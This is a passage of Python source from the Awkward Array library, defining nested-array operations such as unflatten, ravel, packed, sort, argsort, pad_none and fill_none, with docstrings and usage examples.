        # General case: delegate to the layout's own flatten at this axis.
        out = layout.flatten(axis)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def unflatten(array, counts, axis=0, highlevel=True, behavior=None):
    """
    Args:
        array: Data to create an array with an additional level from.
        counts (int or array): Number of elements the new level should have.
            If an integer, the new level will be regularly sized; otherwise,
            it will consist of variable-length lists with the given lengths.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns an array with an additional level of nesting. This is roughly the
    inverse of #ak.flatten, where `counts` were obtained by #ak.num (both with
    `axis=1`).
    For example,
    >>> original = ak.Array([[0, 1, 2], [], [3, 4], [5], [6, 7, 8, 9]])
    >>> counts = ak.num(original)
    >>> array = ak.flatten(original)
    >>> counts
    <Array [3, 0, 2, 1, 4] type='5 * int64'>
    >>> array
    <Array [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] type='10 * int64'>
    >>> ak.unflatten(array, counts)
    <Array [[0, 1, 2], [], ... [5], [6, 7, 8, 9]] type='5 * var * int64'>
    An inner dimension can be unflattened by setting the `axis` parameter, but
    operations like this constrain the `counts` more tightly.
    For example, we can subdivide an already divided list:
    >>> original = ak.Array([[1, 2, 3, 4], [], [5, 6, 7], [8, 9]])
    >>> print(ak.unflatten(original, [2, 2, 1, 2, 1, 1], axis=1))
    [[[1, 2], [3, 4]], [], [[5], [6, 7]], [[8], [9]]]
    But the counts have to add up to the lengths of those lists. We can't mix
    values from the first `[1, 2, 3, 4]` with values from the next `[5, 6, 7]`.
    >>> print(ak.unflatten(original, [2, 1, 2, 2, 1, 1], axis=1))
    Traceback (most recent call last):
    ...
    ValueError: structure imposed by 'counts' does not fit in the array at axis=1
    Also note that new lists created by this function cannot cross partitions
    (which is only possible at `axis=0`, anyway).
    See also #ak.num and #ak.flatten.
    """
    nplike = ak.nplike.of(array)
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    if isinstance(counts, (numbers.Integral, np.integer)):
        # Scalar count -> regular (fixed-size) lists; no running offsets.
        current_offsets = None
    else:
        counts = ak.operations.convert.to_layout(
            counts, allow_record=False, allow_other=False
        )
        # Move `counts` onto the same kernels library (device) as `array`.
        ptr_lib = ak.operations.convert.kernels(array)
        counts = ak.operations.convert.to_kernels(counts, ptr_lib, highlevel=False)
        if ptr_lib == "cpu":
            counts = ak.operations.convert.to_numpy(counts, allow_missing=True)
            # Missing counts are treated as 0 here and re-masked in `doit`.
            mask = ak.nplike.numpy.ma.getmask(counts)
            counts = ak.nplike.numpy.ma.filled(counts, 0)
        elif ptr_lib == "cuda":
            counts = ak.operations.convert.to_cupy(counts)
            mask = False
        else:
            raise AssertionError(
                "unrecognized kernels lib" + ak._util.exception_suffix(__file__)
            )
        if counts.ndim != 1:
            raise ValueError(
                "counts must be one-dimensional" + ak._util.exception_suffix(__file__)
            )
        if not issubclass(counts.dtype.type, np.integer):
            raise ValueError(
                "counts must be integers" + ak._util.exception_suffix(__file__)
            )
        # One-element list acts as a writable cell: `doit` consumes offsets
        # across successive calls (one per partition).
        current_offsets = [nplike.empty(len(counts) + 1, np.int64)]
        current_offsets[0][0] = 0
        nplike.cumsum(counts, out=current_offsets[0][1:])
    def doit(layout):
        # Wrap `layout` in one new list dimension, consuming as many of the
        # remaining offsets as exactly cover this piece of the array.
        if isinstance(counts, (numbers.Integral, np.integer)):
            if counts < 0 or counts > len(layout):
                raise ValueError(
                    "too large counts for array or negative counts"
                    + ak._util.exception_suffix(__file__)
                )
            out = ak.layout.RegularArray(layout, counts)
        else:
            # Find how many offsets fit within len(layout); the boundary
            # must land exactly on len(layout).
            position = (
                nplike.searchsorted(
                    current_offsets[0], nplike.array([len(layout)]), side="right"
                )[0]
                - 1
            )
            if position >= len(current_offsets[0]) or current_offsets[0][
                position
            ] != len(layout):
                raise ValueError(
                    "structure imposed by 'counts' does not fit in the array or partition "
                    "at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
                )
            offsets = current_offsets[0][: position + 1]
            # Shift the leftover offsets so the next piece starts at 0.
            current_offsets[0] = current_offsets[0][position:] - len(layout)
            out = ak.layout.ListOffsetArray64(ak.layout.Index64(offsets), layout)
            if not isinstance(mask, (bool, np.bool_)):
                # Re-introduce missing counts as missing (None) lists.
                index = ak.layout.Index8(nplike.asarray(mask).astype(np.int8))
                out = ak.layout.ByteMaskedArray(index, out, valid_when=False)
        return out
    if axis == 0 or layout.axis_wrap_if_negative(axis) == 0:
        if isinstance(layout, ak.partition.PartitionedArray):
            outparts = []
            for part in layout.partitions:
                outparts.append(doit(part))
            out = ak.partition.IrregularlyPartitionedArray(outparts)
        else:
            out = doit(layout)
    else:
        def transform(layout, depth, posaxis):
            # Pack the current layout. This ensures that the `counts` array,
            # which is computed with these layouts applied, aligns with the
            # internal layout to be unflattened (#910)
            layout = _pack_layout(layout)
            posaxis = layout.axis_wrap_if_negative(posaxis)
            if posaxis == depth and isinstance(layout, ak._util.listtypes):
                # We are one *above* the level where we want to apply this.
                listoffsetarray = layout.toListOffsetArray64(True)
                outeroffsets = nplike.asarray(listoffsetarray.offsets)
                content = doit(listoffsetarray.content[: outeroffsets[-1]])
                if isinstance(content, ak.layout.ByteMaskedArray):
                    inneroffsets = nplike.asarray(content.content.offsets)
                elif isinstance(content, ak.layout.RegularArray):
                    inneroffsets = nplike.asarray(
                        content.toListOffsetArray64(True).offsets
                    )
                else:
                    inneroffsets = nplike.asarray(content.offsets)
                # Every old outer-list boundary must coincide with one of
                # the new inner-list boundaries.
                positions = (
                    nplike.searchsorted(inneroffsets, outeroffsets, side="right") - 1
                )
                if not nplike.array_equal(inneroffsets[positions], outeroffsets):
                    raise ValueError(
                        "structure imposed by 'counts' does not fit in the array or partition "
                        "at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
                    )
                return ak.layout.ListOffsetArray64(
                    ak.layout.Index64(positions), content
                )
            else:
                return ak._util.transform_child_layouts(
                    transform, layout, depth, posaxis
                )
        if isinstance(layout, ak.partition.PartitionedArray):
            outparts = []
            for part in layout.partitions:
                outparts.append(transform(part, depth=1, posaxis=axis))
            out = ak.partition.IrregularlyPartitionedArray(outparts)
        else:
            out = transform(layout, depth=1, posaxis=axis)
    if current_offsets is not None and not (
        len(current_offsets[0]) == 1 and current_offsets[0][0] == 0
    ):
        # Every count must have been consumed exactly.
        raise ValueError(
            "structure imposed by 'counts' does not fit in the array or partition "
            "at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
        )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("ravel")
def ravel(array, highlevel=True, behavior=None):
    """
    Args:
        array: Data containing nested lists to flatten.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns a one-dimensional array in which every level of nesting has been
    removed — the Awkward Array equivalent of NumPy's `np.ravel`.
    For example, the doubly nested array
    ak.Array([[[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6]], [], [[7.7], [8.8, 9.9]]])
    becomes
    >>> print(ak.ravel(array))
    [1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
    Missing values are eliminated in the process: once the list boundaries
    are erased, an empty list and a value of None are indistinguishable.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    nplike = ak.nplike.of(layout)
    # completely_flatten yields one 1-d buffer per leaf; stitch them into a
    # single NumpyArray node.
    chunks = ak._util.completely_flatten(layout)
    assert isinstance(chunks, tuple)
    assert all(isinstance(chunk, np.ndarray) for chunk in chunks)
    if any(isinstance(chunk, nplike.ma.MaskedArray) for chunk in chunks):
        flat = nplike.ma.concatenate(chunks)
    else:
        flat = nplike.concatenate(chunks)
    out = ak.layout.NumpyArray(flat)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def _pack_layout(layout):
    """
    Pack a single layout node into its most compact, contiguous form.
    Helper for #ak.packed (and #ak.unflatten). Only the node itself is
    handled here; child nodes are packed separately by the caller via
    ak._util.transform_child_layouts, so each branch below normalizes just
    the node it receives.
    """
    nplike = ak.nplike.of(layout)
    # NumpyArray data is made C-contiguous
    if isinstance(layout, ak.layout.NumpyArray):
        return layout.contiguous()
    # EmptyArray is a no-op
    elif isinstance(layout, ak.layout.EmptyArray):
        return layout
    # IndexedOptionArray: project the content, keeping the missing entries
    # as -1 values in a compacted index
    elif isinstance(layout, ak._util.indexedoptiontypes):
        if isinstance(layout.content, ak._util.optiontypes):
            return layout.simplify()
        index = nplike.asarray(layout.index)
        new_index = nplike.zeros_like(index)
        is_none = index < 0
        new_index[is_none] = -1
        # Non-missing entries are renumbered 0, 1, 2, ... to match the
        # projected content.
        new_index[~is_none] = nplike.arange(len(new_index) - nplike.sum(is_none))
        return ak.layout.IndexedOptionArray64(
            ak.layout.Index64(new_index),
            layout.project(),
            layout.identities,
            layout.parameters,
        )
    # Project indexed arrays
    elif isinstance(layout, ak._util.indexedtypes):
        return layout.project()
    # ListArray performs both ordering and resizing
    elif isinstance(
        layout,
        (
            ak.layout.ListArray32,
            ak.layout.ListArrayU32,
            ak.layout.ListArray64,
        ),
    ):
        return layout.toListOffsetArray64(True)
    # ListOffsetArray performs resizing
    elif isinstance(
        layout,
        (
            ak.layout.ListOffsetArray32,
            ak.layout.ListOffsetArray64,
            ak.layout.ListOffsetArrayU32,
        ),
    ):
        # After normalizing to offsets starting at 0, anything past the last
        # offset is unreachable and can be trimmed.
        new_layout = layout.toListOffsetArray64(True)
        new_length = new_layout.offsets[-1]
        return ak.layout.ListOffsetArray64(
            new_layout.offsets,
            new_layout.content[:new_length],
            new_layout.identities,
            new_layout.parameters,
        )
    # UnmaskedArray just wraps another array
    elif isinstance(layout, ak.layout.UnmaskedArray):
        return ak.layout.UnmaskedArray(
            layout.content, layout.identities, layout.parameters
        )
    # UnionArrays can be simplified
    # and their contents too
    elif isinstance(layout, ak._util.uniontypes):
        layout = layout.simplify()
        # If simplification eliminated the union type entirely
        if not isinstance(layout, ak._util.uniontypes):
            return layout
        # Pack simplified layout
        tags = nplike.asarray(layout.tags)
        index = nplike.asarray(layout.index)
        new_contents = [None] * len(layout.contents)
        new_index = nplike.zeros_like(index)
        # Compact indices: each projected content is indexed 0, 1, 2, ...
        # in the order its elements appear in the union.
        for i in range(len(layout.contents)):
            is_i = tags == i
            new_contents[i] = layout.project(i)
            new_index[is_i] = nplike.arange(nplike.sum(is_i))
        return ak.layout.UnionArray8_64(
            ak.layout.Index8(tags),
            ak.layout.Index64(new_index),
            new_contents,
            layout.identities,
            layout.parameters,
        )
    # RecordArray contents can be truncated
    elif isinstance(layout, ak.layout.RecordArray):
        # Field arrays may be longer than the record array; trim them.
        return ak.layout.RecordArray(
            [c[: len(layout)] for c in layout.contents],
            layout.recordlookup,
            len(layout),
            layout.identities,
            layout.parameters,
        )
    # RegularArrays can change length
    elif isinstance(layout, ak.layout.RegularArray):
        if not len(layout):
            return layout
        content = layout.content
        # Truncate content to perfect multiple of the RegularArray size
        if layout.size > 0:
            r = len(content) % layout.size
            content = content[: len(content) - r]
        else:
            content = content[:0]
        return ak.layout.RegularArray(
            content,
            layout.size,
            len(layout),
            layout.identities,
            layout.parameters,
        )
    # BitMaskedArrays can change length
    elif isinstance(layout, ak.layout.BitMaskedArray):
        layout = layout.simplify()
        # Non-primitive contents (e.g. records) go through the indexed-option
        # form instead of staying bit-masked.
        if not isinstance(ak.type(layout.content), ak.types.PrimitiveType):
            return layout.toIndexedOptionArray64()
        return ak.layout.BitMaskedArray(
            layout.mask,
            layout.content[: len(layout)],
            layout.valid_when,
            len(layout),
            layout.lsb_order,
            layout.identities,
            layout.parameters,
        )
    # ByteMaskedArrays can change length
    elif isinstance(layout, ak.layout.ByteMaskedArray):
        layout = layout.simplify()
        # Same record-content special case as BitMaskedArray above.
        if not isinstance(ak.type(layout.content), ak.types.PrimitiveType):
            return layout.toIndexedOptionArray64()
        return ak.layout.ByteMaskedArray(
            layout.mask,
            layout.content[: len(layout)],
            layout.valid_when,
            layout.identities,
            layout.parameters,
        )
    # VirtualArrays are materialized
    elif isinstance(layout, ak.layout.VirtualArray):
        return layout.array
    # PartitionedArrays pass through; their partitions are packed as children
    elif isinstance(layout, ak.partition.PartitionedArray):
        return layout
    # A Record becomes a record over a single-item RecordArray
    elif isinstance(layout, ak.layout.Record):
        return ak.layout.Record(layout.array[layout.at : layout.at + 1], 0)
    # Finally, fall through to failure
    else:
        raise AssertionError(
            "unrecognized layout: " + repr(layout) + ak._util.exception_suffix(__file__)
        )
def packed(array, highlevel=True, behavior=None):
    """
    Args:
        array: Array whose internal structure will be packed.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns an array with the same data as the input, but whose internal
    nodes have been packed into their most compact, contiguous form:
    - #ak.layout.NumpyArray buffers become C-contiguous
    - #ak.layout.RegularArray and #ak.layout.RecordArray trim unreachable content
    - #ak.layout.ListArray becomes #ak.layout.ListOffsetArray with contiguous lists
    - #ak.layout.ListOffsetArray starts at `offsets[0] == 0` with trimmed content
    - #ak.layout.IndexedArray gets projected
    - #ak.layout.IndexedOptionArray keeps a simplified `index` if it contains
      records, otherwise becomes #ak.layout.ByteMaskedArray
    - #ak.layout.ByteMaskedArray and #ak.layout.BitMaskedArray become
      #ak.layout.IndexedOptionArray if they contain records, otherwise stay as-is
    - #ak.layout.UnionArray gets projected contents
    - #ak.layout.VirtualArray gets materialized
    - #ak.layout.Record becomes a record over a one-item #ak.layout.RecordArray
    For example, a lazily sliced array carries its original (oversized)
    buffers around:
    >>> a = ak.Array([[1, 2, 3], [], [4, 5], [6], [7, 8, 9, 10]])
    >>> b = a[::-1]
    >>> b.layout
    <ListArray64>
    ...
    </ListArray64>
    whereas `ak.packed(b)` rebuilds it as a minimal ListOffsetArray over a
    freshly compacted buffer.
    Packing minimizes the output size of data sent to #ak.to_buffers
    (conversions through Arrow, #ak.to_arrow and #ak.to_parquet, already pack
    as part of the conversion). See also #ak.to_buffers.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    def recurse(node, depth=1, user=None):
        # Pack this node first, then descend into its children so that the
        # whole tree ends up packed.
        packed_node = _pack_layout(node)
        return ak._util.transform_child_layouts(recurse, packed_node, depth, user)
    return ak._util.maybe_wrap_like(recurse(layout), array, behavior, highlevel)
def local_index(array, axis=-1, highlevel=True, behavior=None):
    """
    Args:
        array: Array to index.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns integer positions counted within each list at the chosen `axis`:
    at `axis=0` the result is simply `[0, 1, 2, ...]` over the whole array,
    while at deeper axes the count restarts at `0` for every list.
    For example,
    >>> array = ak.Array([
    ...     [[0.0, 1.1, 2.2], []],
    ...     [[3.3, 4.4]],
    ...     [],
    ...     [[5.5], [], [6.6, 7.7, 8.8, 9.9]]])
    >>> ak.local_index(array, axis=0)
    <Array [0, 1, 2, 3] type='4 * int64'>
    >>> ak.local_index(array, axis=1)
    <Array [[0, 1], [0], [], [0, 1, 2]] type='4 * var * int64'>
    >>> ak.local_index(array, axis=2)
    <Array [[[0, 1, 2], []], ... [], [0, 1, 2, 3]]] type='4 * var * var * int64'>
    Zipping the local index of every axis together produces a Pandas-style
    MultiIndex:
    >>> multiindex = ak.zip([ak.local_index(array, i) for i in range(array.ndim)])
    but if Pandas itself is the goal, #ak.to_pandas does this directly.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    indexed = layout.localindex(axis)
    return ak._util.maybe_wrap_like(indexed, array, behavior, highlevel)
@ak._connect._numpy.implements("sort")
def sort(array, axis=-1, ascending=True, stable=True, highlevel=True, behavior=None):
    """
    Args:
        array: Data to sort, possibly within nested lists.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        ascending (bool): If True, each sorted group runs from its smallest
            value to its largest; if False, from largest to smallest.
        stable (bool): If True, a stable sorting algorithm is used; if False,
            an algorithm without a stability guarantee may be chosen instead.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Sorts the lists of `array` at the chosen `axis`, for example
    >>> ak.sort(ak.Array([[7, 5, 7], [], [2], [8, 2]]))
    <Array [[5, 7, 7], [], [2], [2, 8]] type='4 * var * int64'>
    See also #ak.argsort.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    # The heavy lifting is delegated to the layout's own sort kernel.
    sorted_layout = layout.sort(axis, ascending, stable)
    return ak._util.maybe_wrap_like(sorted_layout, array, behavior, highlevel)
@ak._connect._numpy.implements("argsort")
def argsort(array, axis=-1, ascending=True, stable=True, highlevel=True, behavior=None):
    """
    Args:
        array: Data for which to get a sorting index, possibly within nested
            lists.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        ascending (bool): If True, the first value in each sorted group
            will be smallest, the last value largest; if False, the order
            is from largest to smallest.
        stable (bool): If True, use a stable sorting algorithm (introsort:
            a hybrid of quicksort, heapsort, and insertion sort); if False,
            use a sorting algorithm that is not guaranteed to be stable
            (heapsort).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns the integer indexes that would sort each list if applied with
    #ak.Array.__getitem__.

    For example,

        >>> ak.argsort(ak.Array([[7.7, 5.5, 7.7], [], [2.2], [8.8, 2.2]]))
        <Array [[1, 0, 2], [], [0], [1, 0]] type='4 * var * int64'>

    The result of this function can be used to index other arrays with the
    same shape:

        >>> data = ak.Array([[7, 5, 7], [], [2], [8, 2]])
        >>> index = ak.argsort(data)
        >>> index
        <Array [[1, 0, 2], [], [0], [1, 0]] type='4 * var * int64'>
        >>> data[index]
        <Array [[5, 7, 7], [], [2], [2, 8]] type='4 * var * int64'>
    """
    # Records cannot be argsorted, so allow_record=False.
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    out = layout.argsort(axis, ascending, stable)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def pad_none(array, target, axis=1, clip=False, highlevel=True, behavior=None):
    """
    Args:
        array: Data containing nested lists to pad to a target length.
        target (int): The intended length of the lists. If `clip=True`,
            the output lists will have exactly this length; otherwise,
            they will have *at least* this length.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        clip (bool): If True, the output lists will have regular lengths
            (#ak.types.RegularType) of exactly `target`; otherwise the
            output lists will have in-principle variable lengths
            (#ak.types.ListType) of at least `target`.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Increase the lengths of lists to a target length by adding None values.

    Consider the following doubly nested `array`.

        ak.Array([[
                   [1.1, 2.2, 3.3],
                   [],
                   [4.4, 5.5],
                   [6.6]],
                  [],
                  [
                   [7.7],
                   [8.8, 9.9]
                  ]])

    At `axis=0`, this operation pads the whole array, adding None at the
    outermost level:

        >>> ak.to_list(ak.pad_none(array, 5, axis=0))
        [[
          [1.1, 2.2, 3.3],
          [],
          [4.4, 5.5],
          [6.6]],
         [],
         [
          [7.7],
          [8.8, 9.9]
         ],
         None,
         None]

    At `axis=1`, this operation pads the first nested level:

        >>> ak.to_list(ak.pad_none(array, 3, axis=1))
        [[
          [1.1, 2.2, 3.3],
          [],
          [4.4, 5.5],
          [6.6]
         ],
         [
          None,
          None,
          None],
         [
          [7.7],
          [8.8, 9.9],
          None
         ]]

    And so on for higher values of `axis`:

        >>> ak.to_list(ak.pad_none(array, 2, axis=2))
        [[
          [1.1, 2.2, 3.3],
          [None, None],
          [4.4, 5.5],
          [6.6, None]
         ],
         [],
         [
          [7.7, None],
          [8.8, 9.9]
         ]]

    Note that the `clip` parameter not only determines whether the lengths are
    at least `target` or exactly `target`, it also determines the type of the
    output:

       * `clip=True` returns regular lists (#ak.types.RegularType), and
       * `clip=False` returns in-principle variable lengths
         (#ak.types.ListType).

    The in-principle variable-length lists might, in fact, all have the same
    length, but the type difference is significant, for instance in
    broadcasting rules (see #ak.broadcast_arrays).

    The difference between

        >>> ak.pad_none(array, 2, axis=2)
        <Array [[[1.1, 2.2, 3.3], ... [8.8, 9.9]]] type='3 * var * var * ?float64'>

    and

        >>> ak.pad_none(array, 2, axis=2, clip=True)
        <Array [[[1.1, 2.2], [None, ... [8.8, 9.9]]] type='3 * var * 2 * ?float64'>

    is not just in the length of `[1.1, 2.2, 3.3]` vs `[1.1, 2.2]`, but also
    in the distinction between the following types.

        >>> ak.type(ak.pad_none(array, 2, axis=2))
        3 * var * var * ?float64
        >>> ak.type(ak.pad_none(array, 2, axis=2, clip=True))
        3 * var * 2 * ?float64
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    # rpad_and_clip produces regular (exact-length) lists; rpad produces
    # variable-length lists of at least `target` items.
    padder = layout.rpad_and_clip if clip else layout.rpad
    return ak._util.maybe_wrap_like(
        padder(target, axis), array, behavior, highlevel
    )
# TODO: remove in 1.7.0!
def _fill_none_deprecated(array, value, highlevel=True, behavior=None):
    # Pre-`axis` implementation of fill_none, kept only for the deprecation
    # path in ak.fill_none: replaces None at *every* level of the array.
    arraylayout = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    nplike = ak.nplike.of(arraylayout)

    if isinstance(arraylayout, ak.partition.PartitionedArray):
        # Apply partition-by-partition; each partition is handled recursively
        # as a low-level layout and re-wrapped at the end.
        out = ak.partition.apply(
            lambda x: _fill_none_deprecated(x, value, highlevel=False), arraylayout
        )
    else:
        # Decide how to wrap `value` as a one-element layout so that fillna
        # can substitute it into the missing slots.
        if (
            isinstance(value, Iterable)
            and not (
                # Strings count as scalars here, not as iterables to unpack
                # (`ak._util.py27`/`unicode` covers legacy Python 2 strings).
                isinstance(value, (str, bytes))
                or (ak._util.py27 and isinstance(value, ak._util.unicode))
            )
            or isinstance(value, (ak.highlevel.Record, ak.layout.Record))
        ):
            valuelayout = ak.operations.convert.to_layout(
                value, allow_record=True, allow_other=False
            )
            if isinstance(valuelayout, ak.layout.Record):
                # A record: slice its backing array down to just this record.
                valuelayout = valuelayout.array[valuelayout.at : valuelayout.at + 1]
            elif len(valuelayout) == 0:
                # An empty iterable: represent it as a length-1 empty list.
                offsets = ak.layout.Index64(nplike.array([0, 0], dtype=np.int64))
                valuelayout = ak.layout.ListOffsetArray64(offsets, valuelayout)
            else:
                # A non-empty iterable: wrap it as a single regular-list item.
                valuelayout = ak.layout.RegularArray(valuelayout, len(valuelayout), 1)
        else:
            # Scalar (or string-like) replacement value: wrap in a length-1 list.
            valuelayout = ak.operations.convert.to_layout(
                [value], allow_record=False, allow_other=False
            )
        out = arraylayout.fillna(valuelayout)
    if highlevel:
        return ak._util.wrap(out, ak._util.behaviorof(array, behavior=behavior))
    else:
        return out
def fill_none(array, value, axis=ak._util.MISSING, highlevel=True, behavior=None):
    """
    Args:
        array: Data in which to replace None with a given value.
        value: Data with which to replace None.
        axis (None or int): If None, replace all None values in the array
            with the given value; if an int, The dimension at which this
            operation is applied. The outermost dimension is `0`, followed
            by `1`, etc., and negative values count backward from the
            innermost: `-1` is the innermost dimension, `-2` is the next
            level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Replaces missing values (None) with a given `value`.

    For example, in the following `array`,

        ak.Array([[1.1, None, 2.2], [], [None, 3.3, 4.4]])

    The None values could be replaced with `0` by

        >>> ak.fill_none(array, 0)
        <Array [[1.1, 0, 2.2], [], [0, 3.3, 4.4]] type='3 * var * float64'>

    The replacement value doesn't strictly need the same type as the
    surrounding data. For example, the None values could also be replaced
    by a string.

        >>> ak.fill_none(array, "hi")
        <Array [[1.1, 'hi', 2.2], ... ['hi', 3.3, 4.4]] type='3 * var * union[float64, s...'>

    The list content now has a union type:

        >>> ak.type(ak.fill_none(array, "hi"))
        3 * var * union[float64, string]

    The values could be floating-point numbers or strings.
    """
    arraylayout = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    nplike = ak.nplike.of(arraylayout)

    # Add a condition for the "old" behaviour: `axis` used to be implicit
    # ("replace at every level").  A missing `axis` is accepted silently only
    # for flat arrays (depth exactly 1), where old and new behavior agree;
    # otherwise a deprecation warning fires and the old all-levels
    # implementation is used.
    if axis is ak._util.MISSING:
        if isinstance(arraylayout, ak.layout.Record):
            mindepth, maxdepth = arraylayout.array.minmax_depth
        else:
            mindepth, maxdepth = arraylayout.minmax_depth
        if mindepth == maxdepth == 1:
            axis = 0
        else:
            ak._util.deprecate(
                "ak.fill_none needs an explicit `axis` because the default will change to `axis=-1`",
                "1.7.0",
                date="2021-10-01",
                will_be="changed",
            )
            return _fill_none_deprecated(
                array, value, highlevel=highlevel, behavior=behavior
            )

    # Convert value type to appropriate layout (same wrapping rules as
    # _fill_none_deprecated: produce a one-element layout for fillna).
    if isinstance(value, (bool, numbers.Number, np.bool_, np.number)) or (
        isinstance(value, np.ndarray)
        and issubclass(value.dtype.type, (np.bool_, np.number))
    ):
        # Numeric scalar or numeric ndarray: hand it to the nplike directly.
        valuelayout = ak.operations.convert.to_layout(
            nplike.asarray(value), allow_record=False, allow_other=False
        )
    elif (
        isinstance(value, Iterable)
        and not (
            # Strings count as scalars, not as iterables to unpack.
            isinstance(value, (str, bytes))
            or (ak._util.py27 and isinstance(value, ak._util.unicode))
        )
        or isinstance(value, (ak.highlevel.Record, ak.layout.Record))
    ):
        valuelayout = ak.operations.convert.to_layout(
            value, allow_record=True, allow_other=False
        )
        if isinstance(valuelayout, ak.layout.Record):
            # A record: slice its backing array down to just this record.
            valuelayout = valuelayout.array[valuelayout.at : valuelayout.at + 1]
        elif len(valuelayout) == 0:
            # An empty iterable: represent it as a length-1 empty list.
            offsets = ak.layout.Index64(nplike.array([0, 0], dtype=np.int64))
            valuelayout = ak.layout.ListOffsetArray64(offsets, valuelayout)
        else:
            # A non-empty iterable: wrap it as a single regular-list item.
            valuelayout = ak.layout.RegularArray(valuelayout, len(valuelayout), 1)
    else:
        # Anything else (e.g. a string): wrap in a length-1 list.
        valuelayout = ak.operations.convert.to_layout(
            [value], allow_record=False, allow_other=False
        )

    def maybe_fillna(layout):
        # Only option-type nodes can hold None; other node types pass through.
        if isinstance(layout, ak._util.optiontypes):
            return layout.fillna(valuelayout)
        else:
            return layout

    if axis is None:
        # Replace None at every level of the structure.
        def transform(layout, depth, posaxis):
            return ak._util.transform_child_layouts(
                transform, maybe_fillna(layout), depth, posaxis
            )

    else:
        # Replace None only at the requested depth; the negative-axis wrap is
        # recomputed per node because depth can vary across the tree.
        def transform(layout, depth, posaxis):
            posaxis = layout.axis_wrap_if_negative(posaxis)
            if posaxis + 1 < depth:
                return layout
            if posaxis + 1 == depth:
                layout = maybe_fillna(layout)
            return ak._util.transform_child_layouts(transform, layout, depth, posaxis)

    out = transform(arraylayout, 1, axis)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def is_none(array, axis=0, highlevel=True, behavior=None):
    """
    Args:
        array: Data to check for missing values (None).
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns an array whose value is True where an element of `array` is None;
    False otherwise (at a given `axis` depth).
    """

    # `posaxis` is threaded through recursively_apply as the "user" value
    # (pass_user=True / user=axis below): returning it from a non-matching
    # node propagates the (possibly re-wrapped) axis down to the children.
    def getfunction(layout, depth, posaxis):
        posaxis = layout.axis_wrap_if_negative(posaxis)
        if posaxis == depth - 1:
            nplike = ak.nplike.of(layout)
            if isinstance(layout, ak._util.optiontypes):
                # bytemask() is nonzero where the value is missing; reinterpret
                # those bytes as booleans for the result.
                return lambda: ak.layout.NumpyArray(
                    nplike.asarray(layout.bytemask()).view(np.bool_)
                )
            elif isinstance(
                layout,
                (
                    ak._util.unknowntypes,
                    ak._util.listtypes,
                    ak._util.recordtypes,
                    ak.layout.NumpyArray,
                ),
            ):
                # A non-option node at the target depth: nothing is missing.
                return lambda: ak.layout.NumpyArray(
                    nplike.zeros(len(layout), dtype=np.bool_)
                )
            else:
                # Other node types (e.g. indexed/union wrappers): keep
                # descending with the same axis.
                return posaxis
        else:
            return posaxis

    layout = ak.operations.convert.to_layout(array)
    out = ak._util.recursively_apply(
